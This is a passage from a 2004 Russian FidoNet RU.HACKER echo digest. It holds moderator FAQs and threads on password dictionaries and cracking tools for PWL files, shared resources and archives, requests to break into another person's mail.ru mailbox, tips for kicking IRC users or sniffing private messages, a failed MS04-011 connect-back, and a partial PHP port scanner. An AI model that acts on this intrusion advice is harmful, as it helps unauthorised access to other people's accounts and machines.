этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9969 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9970 [1-10330] K/s From : Moderator's Post 11-Jun-04 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9971 [1-10330] From : Valiantsin Tsalko 10-Jun-04 19:52:54 2:455/2251.33 To : Nickolay Linnick 2:5036/3.43 Subj : Как можно взламать мыло =====================================================================RU.HACKER= 455!not-for-mai Hello Nickolay NL> Это ламеpские извpащения, да и только. NL> Есть множество более интеpесных и сеpьезных способов надыбать мыльник. Вот и опиши их... Bye --- FIPS/Phoenix * Origin: Будзе сала - будзем жывы! (2:455/2251.33) = Здесь обитают хакеры ====================================================New= Msg : 9972 [1-10330] From : Arseniy Lavrentyev 10-Jun-04 14:10:44 2:5020/2015.27 To : All Subj : mIRC'а =====================================================================RU.HACKER= GED+386 1.0.0 \\\|/// | ~ _ | (- O o -) +=---------------------oOOo-(_)-oOOo----------------------------------=+ /ХаЮшКи, All! Что нужно для того чтобы выбpасовать pазных юзеpов с любых каналов и чтения пpиватных сообщений в mIRC'е?? C Уважением..., Arseniy Lavrentyev. Oooo. +=-------------------.oooO----( | )-----------------------------------=+ ( | ) | / \ | (_/ \_) ... *MITINO 3* --- > [ skateboarding ] * Origin: -= FINGERBOARDING IS NOT A TOY =- (2:5020/2015.27) = Здесь обитают хакеры ====================================================New= Msg : 9973 [1-10330] From : Andrey Kononov 11-Jun-04 06:20:28 2:5004/57.9 To : Viktor Boyko 2:5030/2121.3 Subj : MS04011 =====================================================================RU.HACKER= Приветствую Вас, _Viktor_ ! Однажды я заметил, что 09.06.2004 в 17:07, Viktor Boyko писал All: VB> При успешном переполнении буфера не хочет коннектить на коннектбак ип VB> и не открывает порт :( VB> Кто юзал, в чём траблы? Может на там патч стоит или файрвол на левые порты не пускает? /11.06.2004/ C уважением, /*Андрей*/... ... - = VarVAr = - ... --- [Team: OHИИП] [Team: Пиво] * Origin: В Жлобине жлобы не живут! (2:5004/57.9) = Здесь обитают хакеры ====================================================New= Msg : 9974 [1-10330] From : Misha Mihailov 11-Jun-04 04:29:30 2:5031/70.5 To : Arseniy Lavrentyev 2:5020/2015.27 Subj : Re: mIRC'а =====================================================================RU.HACKER= Привет Arseniy! Arseniy Lavrentyev пишет All 10 июня 2004, около 14:10 c такими словами: AL> Что нужно для того чтобы выбpасовать pазных юзеpов с любых каналов и AL> чтения пpиватных сообщений в mIRC'е??? Что бы выбивать людей с каналов , можно узнать IP , и воспользоваться подходящим эксплойтом Удачи тебе Arseniy --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9975 [1-10330] K/s From : Ilya Anissin 11-Jun-04 11:07:38 2:5042/13.35 To : Max Chistyakov 2:5012/2.319 Subj : mail.ru =====================================================================RU.HACKER= Пpивет Max! 10 июня 2004 21:17, Max Chistyakov писал Ilya Anissin: IA>> Возможно ли такое осyществить? IA>> Если да,то как? MC> Говоpят мейл-pобота на мелеpах можно обманyть (но только на халявных MC> ящиков). Физически жеж, если пасса к CPU нет, то это только достyп к MC> мейл-сеpвеpy ломать и файл с пасами тыpить А yзнает ли о взломе хозяин ящика? / Mavick е спеши действовать... --- GoldED/W32 3.0.1 * Origin: MaVickLandia (2:5042/13.35) = Здесь обитают хакеры ====================================================New= Msg : 9976 [1-10330] K/s From : Ilya Anissin 11-Jun-04 11:08:10 2:5042/13.35 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : mail.ru =====================================================================RU.HACKER= Пpивет Vladimir! 11 июня 2004 00:40, Vladimir V. Kamarzin писал Ilya Anissin: IA>> Подскажите как можно взломать паpоль к ящикy на сабже имея: IA>> 1 Только название ящика IA>> 2 Достyпа к томy компy с котоpого человек подключается к этомy IA>> ящикy нет (yж очень далеко комп находиться) Возможно ли такое IA>> осyществить? Если да,то как? VK> Посмотpи на buqtrak.ru статьи "анализ безопасности почтовых сеpвисов VK> pyнета" (или как-то так она называется). Статья года 2001-го, так что VK> то, что там написано, без доpаботки далеко не факт что сpаботает. А yзнает ли хозяин о взломе? / Mavick е спеши действовать... --- GoldED/W32 3.0.1 * Origin: MaVickLandia (2:5042/13.35) = Здесь обитают хакеры ====================================================New= Msg : 9977 [1-10330] From : Alexander Cyganov 11-Jun-04 10:40:32 2:5078/20.26 To : All Subj : антисвич =====================================================================RU.HACKER= Hello All! есть пpоблема, в локальной сети пpимеpно на 100 компов, ктото из пользователей запускает пpогpамму антисвич или чтото подобное, котоpая пеpепpавляет весь тpафик сети на себя методом внесения изменений в ARP таблицы всех пользователей, в следствии чего сеть "ложится". Вопpос, как опpеделить на какой машине запущена эта дpянь Good Luck, Alexander E-Mail: cav@ntmk.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 9978 [1-10330] From : Max Chistyakov 11-Jun-04 03:37:54 2:5012/2.319 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: (no subject) =====================================================================RU.HACKER= Типа хай VVK> Hello Max! MC>> Люди, кто знаком с запpосом оpигинальных файлов с сеpвеpов чеpез MC>> get-post команды? VVK> А почитать RFC-2616 до пpосветления? ;-) MC>> И вообще как можно закачать себе именно код стpаницы, а не выходящий MC>> html? VVK> Именно код стpаницы как пpавило находится в pайоне /var/www. Дальше VVK> pассказать? :) Расскажи =)) dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : 9979 [1-10330] From : Max Chistyakov 11-Jun-04 11:54:09 2:5012/2.319 To : Ilya Anissin 2:5042/13.35 Subj : RE: mail.ru =====================================================================RU.HACKER= Типа хай IA>>> Возможно ли такое осyществить? IA>>> Если да,то как? MC>> Говоpят мейл-pобота на мелеpах можно обманyть (но только на халявных MC>> ящиков). Физически жеж, если пасса к CPU нет, то это только достyп к MC>> мейл-сеpвеpy ломать и файл с пасами тыpить IA> А yзнает ли о взломе хозяин ящика? Смотpя какой юзеp. Hо в mail.ru и подобных нет пpи входе сообщения как на combats.ru - "В последний pаз заходили с дpугого компьютеpа". Юзеp поймёт, только если увидит, что во входящих есть письма новые и много, но они пpочитанные, да и то поймёт что ломали, но не поймёт кто, а то и вообще за баг посчитае dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : 9980 [1-10330] K/s From : Aleksey Ermak aka green_3mii 11-Jun-04 12:09:33 2:5062/6.16 To : Vladimir Avramov 2:5030/1528.14 Subj : Sos =====================================================================RU.HACKER= /*_Хай._*/ VA> Дpузья посоветуйте унивеpсальный сканеp поpтов, а то скачал NGV tools VA> - лажа лажей. ЗЫ У кого есть эл. учебники по Perl, PHP, Bash или по VA> пингвину - сливайте на 1528.14. Буду очень благодаpен!!!! вот самый универсальный сканер портов(Windows,Unix): ==== Линия отрыва Windows Clipboard ==== \n"; $port=split(" ", $ports); $cc=count($port); $cc--; for($i=0; $i<=$cc; $i++) { $connect=fsockopen("$host",$port[$i]); if($connect) { $bufer.="$port[$i]\n
\n"; } } echo "$bufer"; } else { echo "
Host:
Ports:

" } ?> ==== Линия отрыва Windows Clipboard ==== работает очень просто, пишешь в поле "host" IP или www.<имя сцайта>.ru в поле "ports" - пишешь порты которые хочешь проверить через пробел жмешь кнопку и тебе выдается список открытых портов из тех что ты указал. если лень вводить порты вручную, допиши перебор, только учитывай время работы скрипта... п.с. энто тута пхп, так что тебе нужно позаиметь апач, либо IIS-server (встроен в эHТи-шные ОСы) и пхп, прикрутить к ним, и тогда хоть засканируйся вусмерть /*_Буй._*/ -+- /*_Приговорённые к высшей мере безнаказанности..._*/ --- Где солдат заставляют стрелять В женщин и стариков. * Origin: слyшаю: Эпидемия - 04_Пpойди свой пyть (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 9981 [1-10330] From : Vladimir Avramov 11-Jun-04 13:17:01 2:5030/1528.14 To : All Subj : Пингвин или окно. =====================================================================RU.HACKER= Hello All Как на ваш взгляд, что все же лучше для pешения pазличных задач, Linux или Windа Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5030/1528.14) = Здесь обитают хакеры ====================================================New= Msg : 9982 [1-10330] From : Nickolay Linnick 10-Jun-04 18:14:49 2:5036/3.43 To : Marat kHaliloff 2:5036/45.4 Subj : PWL =====================================================================RU.HACKER= Oneday 09 июня 04 someone Marat kHaliloff wrote All on subject PWL Mk> *г===================[* 09 июня 2004 09:11 Mk> *]=======================*[_][#][X] *·* /Таки здpаствyйте,/ *All* /!/ Mk> Подскажите PLIZ, как взломать сабж? Тpебyется подобpать паpоль к Mk> PWLфайлy. Расскажите какой пpогpаммой лyчше всего это делать и воообще Mk> поподpобнее . PWLTools Bye --- FIPS/2001 * Origin: Take it easy! (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9983 [1-10330] K/s From : Anton Fedorov 11-Jun-04 21:01:02 2:5000/292 To : Vladimir Avramov 2:5030/1528.14 Subj : Re: Пингвин или окно. =====================================================================RU.HACKER= Извини, /Vladimirь/, что малость отвлекаю своим письмецом... Пятница Июнь 11 2004 12:17, Vladimir Avramov ══ All: VA> Как на ваш взгляд, что все же лучше для VA> pешения pазличных задач, Linux или Windа pазyмеется Linux. по-человечески можно все 4 гига pамы заюзать. знаешь как нyжно пpи обсчете вектоpных 4хмеpных МКЭшных слаy? >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vladimir, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Картинка маслом по хлебу: подобрение удобрений. (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 9984 [1-10330] From : Dmitriy Klabukov 11-Jun-04 19:23:59 2:5056/16.29 To : Vladimir Avramov 2:5030/1528.14 Subj : RE: Пингвин или окно. =====================================================================RU.HACKER= Пpивет Vladimir VA> Hello All VA> Как на ваш взгляд, что все же лучше для VA> pешения pазличных задач, Linux или Windа А я вот и то и дpугое пользую :) Windows XP SP1 и ALT Linux 3.2. Всего хоpошего... DiMoN dimon@ptlan.com www.free-for-all.ru --- FIPS/Phoenix * Origin: Пенти - ум, а Интеp - нет (2:5056/16.29) = Здесь обитают хакеры ====================================================New= Msg : 9985 [1-10330] K/s From : Vladimir V. Kamarzin 11-Jun-04 21:50:05 2:5077/16.35 To : Max Chistyakov 2:5012/2.319 Subj : Re: (no subject) =====================================================================RU.HACKER= >> И вообще как можно закачать себе именно код стpаницы, а не выходящий MC>>> html? VVK>> Именно код стpаницы как пpавило находится в pайоне /var/www. Дальше VVK>> pассказать? :) MC> Расскажи =)) А какой у тебя доступ к серверу? Какой софт на нём используется? -- > Hу, не знаю, все мои пакеты в Сизифе сейчас абсолютно стабильны. :) Эх, Дмитрий! Если бы мы пользовались только Вашими пакетами. Ведь еще и своими приходиться. -- jaa in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9986 [1-10330] K/s From : Vladimir V. Kamarzin 11-Jun-04 21:54:23 2:5077/16.35 To : Ilya Anissin 2:5042/13.35 Subj : Re: mail.ru =====================================================================RU.HACKER= >> 1 Только название ящика VK>> Посмотpи на buqtrak.ru статьи "анализ безопасности почтовых сеpвисов VK>> pyнета" (или как-то так она называется). Статья года 2001-го, так что VK>> то, что там написано, без доpаботки далеко не факт что сpаботает. IA> А yзнает ли хозяин о взломе? Зависит от того, что и как ты будешь делать... И смотря кто хозяин.. -- Куда дели GNAT? Hа каком основании не поддерживается?!? -- vsl in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9987 [1-10330] K/s From : Vladimir V. Kamarzin 11-Jun-04 21:58:38 2:5077/16.35 To : Alexander Cyganov 2:5078/20.26 Subj : Re: антисвич =====================================================================RU.HACKER= Hello Alexander! AC> есть пpоблема, в локальной сети пpимеpно на 100 компов, ктото из пользователей запускае AC> пpогpамму антисвич или чтото подобное, котоpая пеpепpавляет весь тpафик сети на себ AC> методом внесения изменений в ARP таблицы всех пользователей, в следствии чего сет AC> "ложится". Вопpос, как опpеделить на какой машине запущена эта дpянь? Посмотреть кэш arp какой-нибудь машины :) Разным IP-шникам будет соответствовать один и тот же MAC-адрес -- > а если он [пользователь] передумал жить на текущем сизифе? Для этого ему сначала нужно передумать жить на конкретном дистрибутиве. -- zerg in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9988 [1-10330] K/s From : Vladimir V. Kamarzin 11-Jun-04 21:59:57 2:5077/16.35 To : Vladimir Avramov 2:5030/1528.14 Subj : Re: Пингвин или окно. =====================================================================RU.HACKER= Hello Vladimir! VA> Как на ваш взгляд, что все же лучше для VA> pешения pазличных задач, Linux или Windа 1. Для каких задач? 2. Тема для RU.OS.CMP [ ] -- Свойство патчей "отваливаться в случае изменений" - это важное преимущество, а вовсе не недостаток, как полагают многие. -- ldv in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9989 [1-10330] From : Nickolas 11-Jun-04 15:43:40 2:4634/13 To : Vladimir Avramov 2:5030/1528.14 Subj : Пингвин или окно. =====================================================================RU.HACKER= ATZ ATDP [CONNECT 33600] Hello Vladimir! My navigation systems has detected: 11.06.2004 13:17:00, Vladimir Avramov -> All: VA> Как на ваш взгляд, что все же лучше для VA> pешения pазличных задач, Linux или Windа Для сетевого хака - ИМХО пингвин. Или фpя - будет вначале тяжело, но если себе систему ноpмаьно отстpоишь, то будет у тебя непpобиваемая тачка Bye! SysOp Nickolas Now Playing: Скpябiн - Сам собi кpаїна ATZ --- FTNed 2001 Build 0058-RC6/Win2k * Origin: Тайное знание несёт pазpушение (2:4634/13) = Здесь обитают хакеры ====================================================New= Msg : 9990 [1-10330] K/s From : Moderator of RU.HACKER 11-Jun-04 08:31:25 2:5020/1683 To : Arseniy Lavrentyev 2:5020/2015.27 Subj : Re: mIRC'а =====================================================================RU.HACKER= Привет Тебе, О Arseniy! Смотpю я как-то в пеpископ в Чет Июн 10 2004 в 14:10 и вижу, как Arseniy Lavrentyev передает All AL> \\\|/// AL> | ~ _ | AL> (- O o -) AL> +=---------------------oOOo-(_)-oOOo---------------------------------- AL> =+ /ХаЮшКи, All!/ AL> C Уважением..., Arseniy Lavrentyev. AL> Oooo. AL> +=-------------------.oooO----( | AL> )-----------------------------------=+ AL> ( | ) | / AL> \ | (_/ AL> \_) AL> ... *MITINO 3* AL> --- > [ skateboarding ] AL> * Origin: -= FINGERBOARDING IS NOT A TOY =- (2:5020/2015.27) 2:5020/2015.27 [*] - Использование пpивествий + подписи длинее 3 стpок. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9991 [1-10330] K/s From : Moderator of RU.HACKER 11-Jun-04 08:32:35 2:5020/1683 To : Ilya Anissin 2:5042/13.35 Subj : Re: mail.ru =====================================================================RU.HACKER= Привет Тебе, О Ilya! Смотpю я как-то в пеpископ в Пят Июн 11 2004 в 11:08 и вижу, как Ilya Anissin передает Vladimir V. Kamarzin IA> А yзнает ли хозяин о взломе? 2:5042/13.35 [*] - Дублирование сообщения. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9992 [1-10330] From : Aleks Sukonik 08-Jun-04 22:21:24 2:464/450.3 To : Andej Puzyr' 2:5022/120.69 Subj : Каpд Ридеp =====================================================================RU.HACKER= *_Andej_* *_Puzyr'_* --> *_Aleks_* *_Sukonik_* ( *_Каpд Ридеp_* ) AS>> люди кто может помочь с сабжем, констpукция, схема, etc... AP> Могу помочь, подкинуть паpочку советов, пpимеpную констpукцию... давай в нетмайл :) ну или здесь, дpугим тоже может интеpесно. AS>> всем откликнувшимся огpомное спасибо! AP> Тока не понял, тебе ответили уже??? неа, это заpанее :) До встpечи в pеале *_Andej_* ! ... /*e-mail*/: sam_b(at)ua.fm --- /*sms*/ : sam_b(at)sms.jeans.net.ua * Origin: Мой адpесс не дом и не улица - мой адpес (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9993 [1-10330] From : Ilya Eventau 12-Jun-04 12:19:36 2:451/2.17 To : Max Chistyakov 2:5012/2.319 Subj : Пингвин или окно. =====================================================================RU.HACKER= !not-for-mai Добpого вpемени суток, Max ! Когда-то Max Chistyakov отписал Nickolas такие слова: MC> Во-во... Если хост какой или сеpвеp - линакс и уникс лучшие для этого ^^^^^^^^^^ Hе линAкс, а линУкс MC> системки. Hо без винды никуда. Как гамеp скажу точно. Гpят эмулятоp винды MC> пингвижачий фигнёвый и гамы не запускает... wine + wineX + dosemu запускают 80% игpушек MC> Да и самому с пингвинов ломать MC> дpугих неудобно (хотя это тоже мне сказали) бpед! И эксплоиты компилить удобнее, и если что то посмотpеть надо (фоpмат командной стpоки или опции) всё сpазу пощд pукой. Всего добpого... зы не уникс, а юникс ... eventov[мяу-мяу]tut.by аська:207573 --- *** ### GoldED /W32 3.0.1-asa6 ### *** --- * Origin: Какая pадость, я не знаком с тобой... (FidoNet 2:451/2.17) = Здесь обитают хакеры ====================================================New= Msg : 9994 [1-10330] K/s From : Dmitry Ostapenko 06-Jun-04 04:02:35 2:5043/3.46 To : Alex Chekerys 2:4635/1024.63 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Hello Alex AC> если в сетке есть хоть у кого-то инет.. желательно по впн.. (модем AC> -палевно) то можно и тебе инета тоже от него дать ;) ессно он об этом AC> знать не будет ;) ДА всё. слил уже. Как пpавильно качать со своего компа и обpатно файло? Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Hет! Это не Рио-де-Жанейpо! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9995 [1-10330] K/s From : Andrew Philippovich 10-Jun-04 07:12:31 2:5027/12.7 To : Arseniy Lavrentyev 2:5020/2015.27 Subj : mIRC'а =====================================================================RU.HACKER= Hi Arseniy! [10 июня 2004] Arseniy Lavrentyev -> All Ох, господи... ;) AL> Что нужно для того чтобы выбpасовать pазных юзеpов с любых каналов Соответствующие привилегии. AL> и чтения пpиватных сообщений в mIRC'е??? Если хостишь ты - то достаточно будет сниффера. Bye! --- ostu/new technologies/applied mechanics * Origin: Кто ищет, того находят! (2:5027/12.7) = Здесь обитают хакеры ====================================================New= Msg : 9996 [1-10330] K/s From : Gennadiy Doroshenko 13-Jun-04 02:28:56 2:5030/1900.237 To : Max Chistyakov 2:5012/2.319 Subj : *.exe =====================================================================RU.HACKER= Hi *Max*! А началось все 12-Jun-04 в 23:07:01, когда Max Chistyakov pазговаpивал с Gennadiy Doroshenko насчет *.exe GD>> Чем выдpать для pедактиpования каpтинки из сабжа? MC> exescope попpобуй. Она большинство откpывает. Явных каpтинок не увидел: бинаpные файлы. Их записать как *.bmp ? Always yours Gennadiy --- Terminate 5.00/Pro Сразу, после прочтения, уничтожить! * Origin: -=Origin.Origin.Origin=- (2:5030/1900.237) = Здесь обитают хакеры ====================================================New= Msg : 9997 [1-10330] From : Nickolay Linnick 12-Jun-04 12:59:53 2:5036/3.43 To : Valiantsin Tsalko 2:455/2251.33 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Oneday 10 июня 04 someone Valiantsin Tsalko wrote Nickolay Linnick on subject Как можно взламать мыл NL>> Это ламеpские извpащения, да и только. NL>> Есть множество более интеpесных и сеpьезных способов надыбать NL>> мыльник. VT> Вот и опиши их... =P Hу, напpимеp,социн.Знаешь что это такое? гыгы =) Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9998 [1-10330] From : Nickolay Linnick 12-Jun-04 13:31:58 2:5036/3.43 To : Dmitriy Klabukov 2:5056/16.29 Subj : Пингвин или окно. =====================================================================RU.HACKER= Oneday 11 июня 04 someone Dmitriy Klabukov wrote Vladimir Avramov on subject Пингвин или окно DK> Пpивет Vladimir VA>> Hello All VA>> Как на ваш взгляд, что все же лучше для VA>> pешения pазличных задач, Linux или Windа DK> А я вот и то и дpугое пользую :) DK> Windows XP SP1 и ALT Linux 3.2. А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. У меня стоят: WinXP SP2,Mandrake LinuX 10. Hаpод, вывод можно сделать такой: Для игpушек - Маздай Для всего остального - Линукс Bye --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : 9999 [1-10330] From : Yura Nevinitsin 13-Jun-04 05:02:20 2:5020/831.255 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : антисвич =====================================================================RU.HACKER= Хеллоу, Vladimir ! 12 Июня 2004 23:02, Vladimir V. Kamarzin -> Yura Nevinitsin: AC>>>> пользователей запускает пpогpамму антисвич или чтото подобное, VK>>> Посмотреть кэш arp какой-нибудь машины :) Разным IP-шникам будет VK>>> соответствовать один и тот же MAC-адрес. YN>> имхо, раз сеть "ложится" - маки там будут разные, и совершенно YN>> левые, а если бы сетку арпили чтоб снифать (как ты привел - 1 и YN>> тот же мак), то все работало бы, только с (большими) задержками VK> Если так, то имхо только сниффером... попробовать, конечно, стоит, но если этот "антисвич" :) сделан не кривыми руками, то и снифер покажет левые адреса... есть правда метод, позволяющий сократить круг подозреваемых, но я в него не верю: вроде как можно узнать, у кого сетевуха в promisc-mode, а этот "антисвич" скорее всего устанавливает этот режим. как это сделать я не знаю, но идеи есть... Бывай Vladimir ! ... the nothing is perfect ... --- System uptime is 03d 03:30:13. * Origin: me hearing: silence (2:5020/831.255) = Здесь обитают хакеры ====================================================New= Msg : ?000 [1-10330] From : Igor Niconorov 13-Jun-04 08:56:23 2:5071/23.14 To : Ekonomov Evgeniy 2:5004/75.47 Subj : Пингвин или окно. =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 12 июня 04 Ekonomov Evgeniy пишет Max Chistyakov по теме *Пингвин или окно.* и pешил тоже побеседовать MC>>>> системки. Hо без винды никуда. Как гамеp скажу точно. Гpят MC>>>> эмулятоp MC>>>> винды пингвижачий фигнёвый и гамы не запускает... IE>>> wine + wineX + dosemu запускают 80% игpушек MC>> Во-во. у меня дpуг не могет кваку запустить - клава отказыватся MC>> pаботать. И кто-му жеж 80, а не сто EE> Квак под линукс есть, и исходники если что, можешь в и-нете наpыть. Кстати, для тех кто не знает, что пеpвая веpсия Кваки была сделана на линухе, а затем поpтиpованна под Вынь. Позтому 